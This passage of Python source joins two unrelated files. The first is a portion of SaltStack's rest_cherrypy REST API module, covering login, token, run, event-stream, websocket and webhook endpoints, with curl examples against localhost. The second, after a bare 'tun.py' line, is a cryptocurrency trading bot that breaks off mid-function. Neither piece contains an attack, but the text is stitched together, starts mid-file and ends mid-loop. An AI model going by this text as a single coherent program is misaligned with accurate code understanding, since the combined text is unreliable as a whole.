raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug(
"Configuration for external_auth malformed for eauth '%s', "
"and user '%s'.", token.get('eauth'), token.get('name'),
exc_info=True
)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
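# A minimal sketch (assumes a rest_cherrypy server on http://localhost:8000 and the
# example ``saltuser``/``saltuser`` eauth credentials from the docstring above) of the
# session-based flow from Python: log in once, then reuse the session cookie.
#
#     import requests
#
#     api = requests.Session()
#     api.post('http://localhost:8000/login', json={
#         'username': 'saltuser', 'password': 'saltuser', 'eauth': 'auto',
#     })
#     # The session cookie now maps to the eauth token server-side, so lowstate
#     # chunks can be POSTed to the root URL without further credentials.
#     ret = api.post('http://localhost:8000', json=[
#         {'client': 'local', 'tgt': '*', 'fun': 'test.ping'},
#     ])
#     print(ret.json())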
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization; Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
# Make sure that auth token is hex. If it's None the int() call raises a
# TypeError; if it's something other than hex it raises a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking whether the token exists, not whether
# it allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE-compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to watch only for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is completely asynchronous and Salt is very fast.
If a job is created using a regular POST request, it is possible that
the job return will be available on the SSE stream before the response
for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious about writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
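# A minimal sketch (assumes a rest_cherrypy server on http://localhost:8000 and an
# existing salt-api or Salt eauth token) of consuming the stream above from Python; it
# mirrors the shell example by stripping the SSE field prefixes by hand instead of
# using a dedicated SSE client library.
#
#     import json
#     import requests
#
#     token = '308650d'  # hypothetical token, e.g. returned by /login
#     resp = requests.get('http://localhost:8000/events',
#                         params={'token': token}, stream=True)
#     for line in resp.iter_lines(decode_unicode=True):
#         if line and line.startswith('data: '):
#             event = json.loads(line[len('data: '):])
#             print(event['tag'], event['data'])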
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
The examples above show how to establish a websocket connection to Salt
and activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Note: lowdata formatting stays enabled; the POST handler below reads the
# raw body and unserialized data directly rather than the lowstate.
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
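# A minimal sketch (assumes a rest_cherrypy server on http://localhost:8000 with
# ``webhook_disable_auth`` enabled, purely for illustration) of posting to this hook
# from a build script; the URL path after /hook becomes the suffix of the event tag.
#
#     import requests
#
#     requests.post('http://localhost:8000/hook/mycompany/build/success',
#                   json={'revision': 'aa22a3c4b2e7', 'result': True})
#     # fires an event tagged salt/netapi/hook/mycompany/build/success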
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
tun.py
|
#!/usr/bin/env python3
import os
import pickle
import time
import numpy as np
import talib.abstract as ta
import tensorflow as tf
import threading
from random import randint
from pandas import DataFrame, Series
from sklearn.preprocessing import MinMaxScaler
from keras.models import load_model
from telegram import ParseMode
RETRY_LIMIT = 10
TIME_FRAMES = ['1h', '2h', '4h', '6h', '8h']
SAVE_FILE = '{}/buy_prices.dict'.format(os.path.dirname(os.path.abspath(__file__)))
MODEL_FILE = '{}/lstm.h5'.format(os.path.dirname(os.path.abspath(__file__)))
class Tun(object):
def __init__(self, exchange):
self.exchange = exchange
self.model = load_model(MODEL_FILE)
self.graph = tf.get_default_graph()
self.exchange.load_markets(reload=True)
def save_buy_price(self, symbol, buy_price):
try:
with open(SAVE_FILE, 'rb') as f:
buy_prices = pickle.load(f)
except Exception:
buy_prices = {}
buy_prices[symbol] = buy_price
with open(SAVE_FILE, 'wb') as f:
pickle.dump(buy_prices, f)
def get_buy_price(self, symbol):
try:
with open(SAVE_FILE, 'rb') as f:
buy_prices = pickle.load(f)
except Exception:
buy_prices = {}
if symbol in buy_prices:
return buy_prices[symbol]
return 0
def recharge_fee(self, fee, quote):
symbol = '{}/{}'.format(fee, quote)
last_price = self.exchange.fetch_ticker(symbol)['last']
min_cost = self.exchange.market(symbol)['limits']['cost']['min']
amount = min_cost // last_price + 1
if self.exchange.fetch_balance()['free'][fee] < amount:
self.exchange.create_market_buy_order(symbol, amount)
def price_calculate(self, symbol):
s = self.exchange.market(symbol)
order_book = self.exchange.fetch_order_book(symbol)
buy_price = round(order_book['bids'][0][0] + s['limits']['price']['min'] * randint(2, 5), s['precision']['price'])
sell_price = round(order_book['asks'][0][0] - s['limits']['price']['min'] * randint(2, 5), s['precision']['price'])
return buy_price, sell_price
def order_status(self, order_id, symbol):
order = self.exchange.fetch_order(order_id, symbol)
status = order['status']
filled = order['filled']
remaining = order['remaining']
if status == 'open' and filled > 0:
status = 'parted'
return status, filled, remaining
def buy(self, symbol, budget, update, retry=0):
retry += 1
if retry > RETRY_LIMIT:
return
s = self.exchange.market(symbol)
buy_price, sell_price = self.price_calculate(symbol)
amount = round(budget / buy_price // s['limits']['amount']['min'] * s['limits']['amount']['min'],
s['precision']['amount'])
if amount == 0 or amount * buy_price < s['limits']['cost']['min']:
return
update.message.reply_text(
'%s buy amount:%.8f price:%.8f total:%.8f' % (symbol, amount, buy_price, amount * buy_price))
order = self.exchange.create_limit_buy_order(symbol, amount, buy_price)
time.sleep(1)
order_id = order['id']
wait = 0
while True:
status, filled, remaining = self.order_status(order_id, symbol)
if status == 'open':
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
time.sleep(1)
self.buy(symbol, budget, update, retry)
break
else:
time.sleep(1)
continue
elif status == 'parted':
update.message.reply_text('%s buy partially filled, amount:%.8f' % (symbol, filled))
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
time.sleep(1)
self.save_buy_price(symbol, buy_price)
self.buy(symbol, remaining * buy_price, update, retry)
break
else:
time.sleep(1)
continue
elif status == 'closed':
update.message.reply_text('%s buy filled, amount:%.8f' % (symbol, amount))
self.save_buy_price(symbol, buy_price)
else:
update.message.reply_text('%s buy failed, status:%s' % (symbol, status))
self.exchange.cancel_order(order_id, symbol)
break
def sell(self, symbol, update):
s = self.exchange.market(symbol)
buy_price, sell_price = self.price_calculate(symbol)
balance = self.exchange.fetch_balance()
amount = round(balance['free'][s['base']] // s['limits']['amount']['min'] * s['limits']['amount']['min'],
s['precision']['amount'])
if amount == 0 or amount * sell_price < s['limits']['cost']['min']:
return
update.message.reply_text(
'%s sell amount:%.8f price:%.8f total:%.8f' % (symbol, amount, sell_price, amount * sell_price))
order = self.exchange.create_limit_sell_order(symbol, amount, sell_price)
time.sleep(1)
order_id = order['id']
wait = 0
while True:
status, filled, remaining = self.order_status(order_id, symbol)
if status == 'open':
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
time.sleep(1)
self.sell(symbol, update)
else:
time.sleep(1)
continue
elif status == 'parted':
update.message.reply_text('%s sell partially filled, amount:%.8f' % (symbol, filled))
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
